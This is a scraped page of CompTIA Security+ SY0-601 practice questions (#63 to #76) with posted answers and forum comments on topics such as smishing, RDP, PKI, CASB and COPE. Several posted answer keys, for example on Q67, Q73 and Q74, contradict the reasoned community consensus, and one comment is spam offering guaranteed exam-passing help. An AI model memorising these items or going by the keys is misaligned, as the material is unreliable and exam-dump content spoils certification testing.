upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 117/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #63 Topic 1

A customer service representative reported an unusual text message that was sent to the help desk. The message contained an unrecognized
invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?

A. Vishing

B. Whaling

C. Phishing

D. Smishing

Correct Answer: D

Community vote distribution


D (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: D
Agree with D being correct here
upvoted 8 times

  varun0 5 months ago


Agreed
upvoted 2 times

  DALLASCOWBOYS Most Recent  5 days, 23 hours ago


D. Smishing is phishing via text
upvoted 1 times

  xxxdolorxxx 2 weeks, 2 days ago


Smishing = Text Message
upvoted 1 times

  Orean 3 months, 1 week ago


Selected Answer: D
Pretty straightforward. Smishing, a portmanteau of SMS and phishing, is a specific type of phishing done via text messaging, and it's commonly
used to orchestrate invoice scams or otherwise harvest credentials.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 118/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #64 Topic 1

Which of the following actions would be recommended to improve an incident response process?

A. Train the team to identify the difference between events and incidents.

B. Modify access so the IT team has full access to the compromised assets.

C. Contact the authorities if a cybercrime is suspected.

D. Restrict communication surrounding the response to the IT team.

Correct Answer: A

Community vote distribution


A (79%) B (21%)

  hazeleyes Highly Voted  4 months, 3 weeks ago


Selected Answer: A
A is correct. this training can help CSIRT to know whether to trigger IR mechanisms and reduce instances of false alert. With B - I don't really see
why giving the IT team access can be beneficial, as this could very likely violate least privilege principle.
upvoted 6 times

  DALLASCOWBOYS 5 days, 23 hours ago


Most Recent 
A. Training team to differentiate between incidents and events,
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: A
A is correct since it helps create more response efficiency.
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: A
Training the team makes sense, I don't see how giving the whole IT team full access to zombie computers is going to do anything...
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


An event is defined as an attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or
information stored on such Information System.

An incident is defined as a breach of a system's security policy in order to affect its integrity or availability and/or the unauthorised access or
attempted access to a system or systems
upvoted 2 times

  carpathia 4 months, 3 weeks ago


Selected Answer: A
The Preparation (initial phase) involves correct data events are being logged, the reporting of potential incidents is happening and personnel
training. Nothing in B, C and D is referring to that.
upvoted 2 times

  j0n45 4 months, 3 weeks ago


Of course the answer is "A", logically speaking, if the "CSIRT" and not "IT" team is trained to differentiate between events and incidents, that
would drastically improve their IR process. 🐱‍🚀 🐱‍💻
upvoted 3 times

  j0n45 4 months, 3 weeks ago


Also to add:
Security Incidents Are Events That Produce Consequences
It’s when an event results in a data breach or privacy breach that the event is then deemed a security incident.

For example, a delay in patching a security weakness in vital company software would be an event. It would only be deemed an incident after
your security monitoring team confirmed a resulting data breach by hackers who capitalized on the weakness.
upvoted 2 times

  MarceloFontes1979 4 months, 4 weeks ago


A - I believe is the best choice.
upvoted 2 times

  Liftedkris 5 months ago


Selected Answer: A
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 119/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

I’m leaning towards training so A for me


upvoted 4 times
  varun0 5 months ago
Selected Answer: B
B according to me
upvoted 4 times

  cymm 3 months ago


Any change after a comprise may not be possible. Only way to guarantee full access would be to modify before hand. Then you would violate
principle of least privilege.
upvoted 1 times

  BM9904 4 months, 3 weeks ago


I agree this step comes before training your team in the process
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 120/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #65 Topic 1

A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can
block an attack at
Layer 7? (Choose two.)

A. HIDS

B. NIPS

C. HSM

D. WAF

E. NAC

F. NIDS

Correct Answer: BD

Community vote distribution


BD (75%) DE (15%) 10%

  varun0 Highly Voted  5 months ago


Selected Answer: BD
B & D seems correct, it has to BLOCK the traffic remember.
upvoted 9 times

  DALLASCOWBOYS Most Recent  5 days, 23 hours ago


B&D. Web Apllication Firewall is at the Application Layer, and NIPS, is a prevention system.
upvoted 1 times

  Sandon 2 weeks, 1 day ago


Selected Answer: DE
ChatGPT says it's WAF and NAC.
upvoted 2 times

  asum 2 weeks, 3 days ago


Selected Answer: BD
The IPS sensor analyzes at Layer 2 to Layer 7 the payload of the packets for more sophisticated embedded attacks that might include malicious
data.
upvoted 1 times

  P0wned 1 month ago


Selected Answer: DE
D. WAF (Web Application Firewall) and E. NAC (Network Access Control) can block attacks at Layer 7.

A HIDS (Host-based Intrusion Detection System) is a security system that monitors and analyzes the logs and events on a single host for signs of
potential attacks or malicious activity. It operates at the host level, rather than at the network level, and therefore cannot block attacks at Layer 7.

A NIPS (Network Intrusion Prevention System) is a security system that analyzes network traffic in real-time to identify and prevent potential
attacks or malicious activity. It operates at the network level, rather than at the host level, and therefore cannot block attacks at Layer 7.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: BD
Answer: (B) NIPS and (D) WAF

A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the
Internet. It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection,
among others. A WAF is a protocol layer 7 defense (in the OSI model).

A network intrusion protection system (NIPS) is an umbrella term for a combination of hardware and software systems that protect computer
networks from unauthorized access and malicious activity. NIPS consists of NIDS and IPS. WAF is a firewall. NIPS can operate up to layer 7 by
passing or allowing traffic
upvoted 3 times

  Jossie_C 3 months ago


NIPS consists of NIDS and IPS. WAF is a firewall.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 121/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  jgp 5 months ago


Selected Answer: BD
B & D.
> An inline NIPS is “in line” with traffic, acting as a Layer 3–7 firewall by passing or allowing traffic
upvoted 2 times

  Wiggie 5 months ago


Selected Answer: AD
A&D
Layer 7 = Host Intrusion Detection System and Web Application Firewall
upvoted 2 times

  CapJackSparrow 3 months, 2 weeks ago


I generally look for what you would go for and pick the opposite...
upvoted 8 times

  Gino_Slim 3 months, 2 weeks ago


That is actually hilarious
upvoted 1 times

  ramesh2022 4 months, 2 weeks ago


HIDS only detects and alerts you, can't block or program to block. HIPS or NISP can do.
upvoted 2 times

  redsidemanc2 4 months, 4 weeks ago


BLOCK.IDS only detects. its b and D
upvoted 1 times

  zzzfox 4 months, 4 weeks ago


The question asking block potential attacks. IDS doesnt block the traffic
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 122/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #66 Topic 1

A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The
manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's
concerns?

A. Implement a full system upgrade.

B. Perform a physical-to-virtual migration.

C. Install uninterruptible power supplies.

D. Purchase cybersecurity insurance.

Correct Answer: B

Community vote distribution


B (100%)

  xxxdolorxxx 1 week, 6 days ago


Selected Answer: B
I got for B.
A. Implement a full system upgrade. (Not cost effective)
B. Perform a physical-to-virtual migration. (Cloud would be much more redundant against physical hardware breaking)
C. Install uninterruptible power supplies. (Would only help really if an external power failure, would do nothing if say a hard drive fails)
D. Purchase cybersecurity insurance. (Hardware will still fail)
upvoted 2 times

  KingDrew 3 weeks, 2 days ago


Selected Answer: B
Answer is B
Cloud is far more secure and reliable than a stand-alone computer, and there are many applications out right now for little to no cost that can
store data and software.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Perform a physical-to-virtual migration.

A Physical to virtual migration (P2V), is the migration of physical machines to virtual machines. Converting the PC to a VM temporarily will allow
the PC to continue to its operations on a different host. The other options would require that PC be turned off so the organization would not have
access to its function.
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
It must be B. Purchasing insurance is Transference, not Mitigation.
upvoted 1 times

  zzzfox 4 months, 4 weeks ago


Selected Answer: B
B - Migrate Physical Server to Cloud(Virtual)
upvoted 2 times

  comeragh 5 months ago


Read my full comment Ribeiro I didnt say it was D I was referring to the point you might be in an exam and trying to narrow it down...
upvoted 4 times

  comeragh 5 months ago


Selected Answer: B
To narrow it down for me it would be either B or D. Going with B as the question mentions "without incurring large costs"
upvoted 4 times

  Ribeiro19 5 months ago


Man wake up, D is for cybersecurity, not for hardware failure. the option B is the only answer.
upvoted 5 times

  varun0 5 months ago


Selected Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 123/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

B seems right, without incurring large costs which means full system upgrade is out of question
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 124/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #67 Topic 1

An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics
team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is
known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to
prevent reinfection from the infection vector?

A. Prevent connections over TFTP from the internal network.

B. Create a firewall rule that blocks a 22 from the internet to the server.

C. Disable file sharing over port 445 to the server.

D. Block port 3389 inbound from untrusted networks.

Correct Answer: C

Community vote distribution


D (95%) 5%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
The SMB Protocol (in all its version) doesn't provide functionality to execute files at the remote systems. Its main objective is to support the
sharing of file and print resource between machines.

The only feasible option left is loggin through RDP and manually executing the file.

Correct me if I am wrong
upvoted 31 times

  J_Ark1 3 months ago


yeahh :)
upvoted 1 times

  darkgypsy 3 months ago


You rock !
upvoted 1 times

  banditring 4 months, 3 weeks ago


you the best stoneface :)
upvoted 7 times

  varun0 5 months ago


I agree
upvoted 2 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: D
Answer: Block port 3389 inbound from untrusted networks.

3389 is the default port for RDP connections. RDP is the protocol used to connect to windows desktops/servers remotely. In the scenario, the
malware family is known to be distributed through manually logging on to servers and RDP would require a manual login to access the machine
and be able to easily run scripts on the server especially through a GUI.
upvoted 5 times

  ronniehaang Most Recent  4 days, 17 hours ago


Selected Answer: D
D. Block port 3389 inbound from untrusted networks.

Blocking port 3389, which is used for Remote Desktop Protocol (RDP), would prevent remote access to the server from untrusted networks,
making it less likely for attackers to manually log on to the server and run the malicious code. This would be the best action to prevent reinfection
from the initial infection vector.
upvoted 1 times

  Jimbobilly 1 month, 2 weeks ago


Selected Answer: C
Curveball, the person was physically in front of the server and logged in.
upvoted 1 times

  GMuney 2 months, 2 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 125/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: C
Can't it be C? If we're looking to prevent reinfection then wouldn't we want to block file sharing so that the malicious code wouldn't end up on
the server in the first place?
upvoted 1 times

  babyzilla 3 months ago


Selected Answer: D
D makes the most sense as the best solution to prevent manually logging into a system would be to block RDP. SSH is for Linux. RDP is for
Windows. C would probably be the next step.
upvoted 2 times

  yasuke 3 months, 1 week ago


it had to be a windows server :D
block rdp
upvoted 3 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: D
Read carefully on "to be distributed by manually logging on to servers and running the malicious code" it's mean using RDP. simple way to
prevent is by blocked the RDP port
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: D
The answer is clearly D, the question states "The malware family that was detected is known to be distributed by manually logging on to servers
and running the malicious code." By blocking inbound conncetions on port 3389 (RDP), they would be preventing reinfection.
upvoted 1 times

  Michelle2022 4 months, 4 weeks ago


I think answer c is correct.
"Do I need port 445 open?
We also recommend blocking port 445 on internal firewalls to segment your network – this will prevent internal spreading of the ransomware.
Note that blocking TCP 445 will prevent file and printer sharing – if this is required for business, you may need to leave the port open on some
internal firewalls. "
upvoted 2 times

  yorkwu 5 months ago


Selected Answer: D
Agree with D
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 126/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #68 Topic 1

Which of the following uses SAML for authentication?

A. TOTP

B. Federation

C. Kerberos

D. HOTP

Correct Answer: B

Community vote distribution


B (100%)

  KetReeb Highly Voted  5 months ago


Answer: B: Federation, or identity federation, defines policies, protocols, and practices to manage identities across systems and organizations.
Federation’s ultimate goal is to allow users to seamlessly access data or systems across domains. Federation is enabled through the use of
industry standards such as Security Assertion Markup Language (SAML)
upvoted 20 times

  varun0 5 months ago


I agree
upvoted 1 times

  KingDrew Most Recent  3 weeks, 2 days ago


Selected Answer: B
Federation is correct
upvoted 1 times

  Knowledge33 3 months, 1 week ago


Selected Answer: B
Federation, or identity federation, defines policies, protocols, and practices to manage identities across systems and organizations. Federation’s
ultimate goal is to allow users to seamlessly access data or systems across domains. Federation is enabled through the use of industry
standards such as Security Assertion Markup Language (SAML).
upvoted 3 times

  db97 4 months, 1 week ago


B - Federation
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 127/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #69 Topic 1

The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of
incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed.
Which of the following solutions should the SOC consider to BEST improve its response time?

A. Configure a NIDS appliance using a Switched Port Analyzer.

B. Collect OSINT and catalog the artifacts in a central repository.

C. Implement a SOAR with customizable playbooks.

D. Install a SIEM with community-driven threat intelligence.

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
SOAR allows for automation of IR
upvoted 7 times

  KingDrew Most Recent  3 weeks, 2 days ago


Selected Answer: C
SOAR is automated, and includes security orchestration and response to help resolve security issues more efficiently and timely.
upvoted 1 times

  Jossie_C 3 months ago


Selected Answer: C
Sounds like football but ok
upvoted 2 times

  Tjank 4 months, 1 week ago


Selected Answer: C
SOAR (Security Orchestration, Automation, and Response)
Can use either playbook or runbook. It assists in collecting threat related data from a range of sources and automate responses to low level
threats. (frees up some of the CSIRT time)
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 128/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #70 Topic 1

Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible
for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is
the BEST solution to adopt?

A. PKI

B. Blockchain

C. SAML

D. OAuth

Correct Answer: A

Community vote distribution


A (74%) B (26%)

  ronniehaang 4 days, 17 hours ago


Selected Answer: A
A. PKI (Public Key Infrastructure) is the best solution to adopt as it provides the means to securely issue, manage, and revoke digital certificates
used to verify the identity of users and systems. PKI is commonly used to secure transactions and provide secure communication between
entities, making it a suitable solution for the described scenario.
upvoted 1 times

  Blake89 2 months, 3 weeks ago


 PKI (Public Key Infrastructure)
• Combining asymmetric cryptography with symmetric cryptography along with the hashing and digital certificates, giving us hybrid
cryptography.

Straight from the CompTIA study guide


upvoted 3 times

  BigV 3 months, 3 weeks ago


The question mentions one trusted company, "centralized", it can not be Blockchain which is a "de-centralized" technology.
upvoted 4 times

  elkol 4 months, 1 week ago


Selected Answer: A
Answer is PKI. PKI involves one trusted third-party or middleman which is the company. Blockchain is a decentralized or distributed system. I
think some people lean towards Blockchian as the answer due to "valid transaction" being mentioned which I understand but I will go with "A -
PKI"
upvoted 4 times

  hazeleyes 4 months, 3 weeks ago


Selected Answer: A
PKI. "register and issue artifacts used to sign, encrypt, and decrypt transaction files" - for PKI this artifact is a digital certificate. what artifact
does the blockchain "register" and "issue" that does this?
upvoted 2 times

  KetReeb 5 months ago


Selected Answer: A
I have to go with A: PKI.
Ref the following: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786417(v=ws.11)
upvoted 3 times

  varun0 5 months ago


Selected Answer: A
PKI seems like it
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: B
Blockchain
upvoted 3 times

  CapJackSparrow 3 months, 2 weeks ago


I was going to go with blockchain, then I seen YOU went with blockchain.. so now I'm pretty sure it's not blockchain.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 129/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 8 times
  Jossie_C 3 months ago
Block chain is decentralized. Incorrect
upvoted 1 times

  varun0 5 months ago


Selected Answer: B
Blockchain is the best for transactions
upvoted 2 times

  varun0 5 months ago


Disregard this, I'm going with PKI after much consideration
upvoted 6 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 130/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #71 Topic 1

A security analyst has been asked by the Chief Information Security Officer to:
✑ develop a secure method of providing centralized management of infrastructure
✑ reduce the need to constantly replace aging end user machines
✑ provide a consistent user desktop experience
Which of the following BEST meets these requirements?

A. BYOD

B. Mobile device management

C. VDI

D. Containerization

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
VDI seems to be it
upvoted 6 times

  applepieboy Most Recent  1 week, 2 days ago


Selected Answer: C
Pretty clearly VDI. 2 big giveaways
1. VDI makes centralized management easier
2. Since you push the same desktop it is the only thing that provides a consistent desktop experience.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: VDI

Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts
desktop environments on a centralized server and deploys them to end-users on request.
upvoted 2 times

  Jossie_C 3 months ago


Virtual desktops so that it can be combined with BYOD to save money.
upvoted 2 times

  Katyaz 3 months, 3 weeks ago


VDI appears to be correct
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
Agree with C VDI - "consistent user desktop experience"
upvoted 3 times

  stoneface 5 months ago


plus, no need to replace aging end user machines
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 131/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #72 Topic 1

Which of the following terms describes a broad range of information that is sensitive to a specific organization?

A. Public

B. Top secret

C. Proprietary

D. Open-source

Correct Answer: C

Community vote distribution


C (100%)

  IQ30 Highly Voted  5 months ago


Professor Messer notes:
• Proprietary
– Data that is the property of an organization
– May also include trade secrets
– Often data unique to an organization
upvoted 6 times

  DALLASCOWBOYS 5 days, 22 hours ago


Most Recent 
C. Proprietary is specific to 1 organization
upvoted 1 times

  applepieboy 1 week, 2 days ago


Selected Answer: C
Proprietary would definitely be the answer on an exam, but top secret is still accurate.
upvoted 1 times

  Nirmalabhi 2 months ago


Selected Answer: C
no brainer. Proprietary should be the answer
upvoted 2 times

  [Removed] 2 months, 3 weeks ago


hello everyone, are you interested in taking any exam certification exam? Contact me now for remote support. Success guaranteed in just a
single attempt. wa.me/12694315721
upvoted 2 times

  viksap 2 months, 2 weeks ago


what's the proposal?
upvoted 1 times

  eli_2000 2 months, 3 weeks ago


i need that
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Proprietary

Proprietary information, also known as a trade secret, is information a company wishes to keep confidential
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
I agree with C
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 132/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #73 Topic 1

A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO
believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls. Which of the
following should be implemented to BEST address the CSO's concerns? (Choose two.)

A. A WAF

B. A CASB

C. An NG-SWG

D. Segmentation

E. Encryption

F. Containerization

Correct Answer: CD

Community vote distribution


BC (97%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: BC
NG-SWG -> NG SWG) is designed to address the key cloud and web security use cases encompassing granular policy controls, web filtering,
threat protection, and data protection spanning managed and unmanaged apps, cloud services, and web traffic.

CASB The CASB serves as a policy enforcement center, consolidating multiple types of security policy enforcement and applying them to
everything your business utilizes in the cloud—regardless of what sort of device is attempting to access it, including unmanaged smartphones,
IoT devices, or personal laptops.
upvoted 25 times

  carpathia Highly Voted  2 months, 2 weeks ago


Selected Answer: BC
CASB and NGSWG (pg 164 in D Gibson's book on SY0-601).
upvoted 5 times

  scarceanimal Most Recent  15 hours, 32 minutes ago


Selected Answer: BC
both cloud controls that address the dude's concerns. :)
upvoted 1 times

  mhmtn 3 days, 3 hours ago


I think C and D. I have been inspired divide and manage policy that is a British tactic on the head of century:)
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: BC
Correct would be B & C
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: BC
https://www.netskope.com/blog/where-casb-and-swg-are-headed
It looks like segmentation in the cloud is not that efficient or you'll still need to secure the segments with, well, SWGs probably.
upvoted 1 times

  BigV 3 months ago


How Does Cloud Network Segmentation Support a Defense In-Depth Strategy?
Cloud network segmentation, at its heart, is a Defense-in-Depth cybersecurity approach. It can effectively reduce the risk of data breaches as it
wraps layer upon layer of security around IT systems and data. This multi-layered cybersecurity strategy prevents malicious malware from
spreading across every network in a business organization. It can also efficiently block hackers from quickly accessing networks and eliminate
the possibility of sensitive data from being exposed.
upvoted 1 times

  Jossie_C 3 months ago


Segmentation isn't enough because you still need to detect threats, begging the question.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 133/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  03allen 3 months, 4 weeks ago


why not a cloud-based WAF?
upvoted 2 times

  _bishalk__ 4 months, 1 week ago


C and D for sure. Cloud Access Security broker is a security policy enforcement point that is placed between Cloud service provider and service
consumer. Creating segments will help to examine the traffic between segments providing extra security.
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: CD
CASB is more like a policy enforcer, but it might as well be. Looks like SWG and definitely cloud segmentation (it does exactky that, inspection of
packets etc - pg 403 of some book I am studying from 9781260464009).
upvoted 1 times

  carpathia 4 months, 3 weeks ago


I have just found this: "Many organizations are implementing Cloud Access Security Broker (CASB) technology to protect critical corporate
data stored within cloud apps. Amongst many other preventative and detective controls, a key feature of CASBs is the ability to encrypt data
stored within cloud apps." It could as well be CASB and segmentation.
upvoted 1 times

  Wiggie 5 months ago


Selected Answer: BC
B & C are correct
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 134/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #74 Topic 1

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users'
corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment
models is being utilized?

A. MDM and application management

B. BYOD and containers

C. COPE and VDI

D. CYOD and VMs

Correct Answer: B

Community vote distribution


C (90%) 6%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: C
Bring your own device (BYOD)—the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the
company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of
oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.
Corporate owned, business only (COBO)—the device is the property of the company and may only be used for company business.
Corporate owned, personally-enabled (COPE)—the device is chosen and supplied by the company and remains its property. The employee may
use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in
force).
Choose your own device (CYOD)—much the same as COPE but the employee is given a choice of device from a list.
upvoted 29 times

  applepieboy Most Recent  1 week, 2 days ago


Selected Answer: C
There is no way to no whether or not VDI is involved in this situation, but the answer is clearly the one with COPE (corporate owned, personally
enabled). The workers don't own the device, but it is allowed to be used for personal business. By definition COPE
upvoted 2 times

  byfener 1 month, 3 weeks ago


Selected Answer: C
It has to be C , in the explanation say " An organization is planning to roll out a new mobile device policy and issue each employee a new laptop.
"
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: C
VDI is installed on laptops, no probs (search best laptops for VDI on Google). I don't think anyone uses Terminals anymore. COPE does allow
users to use the device for personal activities.
upvoted 3 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
answer is hidden in the question! Company is providing the laptops .. so its COPE
upvoted 4 times

  remtech 5 days, 21 hours ago


says - issue each employee COPE
upvoted 1 times

  cozzmo 4 months, 4 weeks ago


NOT VDI: issue each employee a new laptop. (VDI is a virtual workspace on a server. so you don't get a laptop).
NOT BYOD: issue each employee a new laptop.
NONE of these work!
upvoted 1 times

  TR3Y 4 months, 2 weeks ago


VDI can be used with COPE devices. I currently work at an organization that leverages VDI and gives us laptops....
upvoted 5 times

  Ay_ma 4 months, 4 weeks ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 135/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

COPE: Corporate-Owned Personally Enabled. The question states that the company is handing out laptops but then they can use them outside
of business requirements.
VDI (Virtual Desktop Infrastructure): You can access Operating Systems Virtually, It's like a whole desktop, but virtual.
Regarding the question, the employees can access company data through VDI, while being able to use the laptops for personal stuff.
upvoted 4 times
  Wiggie 5 months ago
Selected Answer: A
https://www.ibm.com/topics/mobile-device-management
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
Agree with C here. "issue each employee a new laptop". Laptops are issued so cannot be BYOD or CYOD.
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
Corporate is providing the laptops and can be used for personal use
upvoted 1 times

  Wiggie 5 months ago


Selected Answer: A
https://control.connectwise.com/blog/remote-support-access/what-is-mobile-device-management-
mdm#:~:text=of%20traditional%20RMM.-,MDM%20is%20a%20type%20of%20security%20software%20used%20by%20an,being%20used%
20in%20the%20organization.
upvoted 1 times

  Kristi 5 months ago


Selected Answer: D
If the company is issuing the laptop's in not BYOD whatever their purpose is.Tricky question
upvoted 1 times

  Sandon 1 week ago


It's really not
upvoted 1 times

  Boogie_79 5 months, 1 week ago


Selected Answer: D
BOYD is not issued by the organization so that is incorrect. the question states that the company is issuing new laptops to the employees so that
clearly is CYOD
upvoted 2 times

  Vishnuks 5 months ago


These laptops would access the users' corporate operating system remotely>> means VDI. So I think answer should be C.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 136/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #75 Topic 1

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further
investigation, a security analyst notices the following:
✑ All users share workstations throughout the day.
✑ Endpoint protection was disabled on several workstations throughout the network.
✑ Travel times on logins from the affected users are impossible.
✑ Sensitive data is being uploaded to external sites.
All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

A. Brute-force

B. Keylogger

C. Dictionary

D. Rainbow

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
A Keylogger would be the reason of why even after resetting the passwords the issue persisted.

There is no information about the password itself that would allows to determine if any brute force attack method is being used
upvoted 14 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
Keyloggers seems to be it.

Enduser protection is disabled and someone installed a keyloggers since workstations are being shared. Changing password doesn't uninstall
this keylogger which is likely recording the new changed passwords and sending them out to the attacker.
upvoted 8 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: B
Answer - Keylogger

A keylogger or keystroke logger is a type of monitoring software that can be used to collect keystrokes that you type. A keylogger was likely used
to capture various sensitive information and credentials. As the issue continued after the password reset, the keylogger was still capturing
information as it wasn't removed.
=========================
Brute-force - trail and error attempts to guess login info
Dictionary - a form of brute force attack that uses common words, phrases and variations
Rainbow - uses tables of reversed hashes to crack passwords
upvoted 2 times

  Knowledge33 3 months, 1 week ago


There is no relationship between the context and the questions/responses. It's so weird
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 137/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #76 Topic 1

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory
contents. Which of the following backup types should be used?

A. Snapshot

B. Differential

C. Cloud

D. Full

E. Incremental

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
A snapshot preserves the state and data of a virtual machine at a specific point in time.
The state includes the virtual machine’s power state (for example, powered-on, powered-off, suspended).
The data includes all of the files that make up the virtual machine. This includes disks, memory, and other devices, such as virtual network
interface cards.
A virtual machine provides several operations for creating and managing snapshots and snapshot chains. These operations let you create
snapshots, revert to any snapshot in the chain, and remove snapshots. You can create extensive snapshot trees.
upvoted 16 times

  JaMorant Most Recent  5 days, 8 hours ago


present state is the keyword in this case so snapshot will do the job
upvoted 1 times

  kennyleung0514 1 month, 1 week ago


A VM snapshot file consists of all the files stored on the storage devices of a virtual machine. Taking a snapshot creates files with extensions
.vmdk, -delta.vmdk, .vmsd, and .vmsn, which are stored with the VM base files.

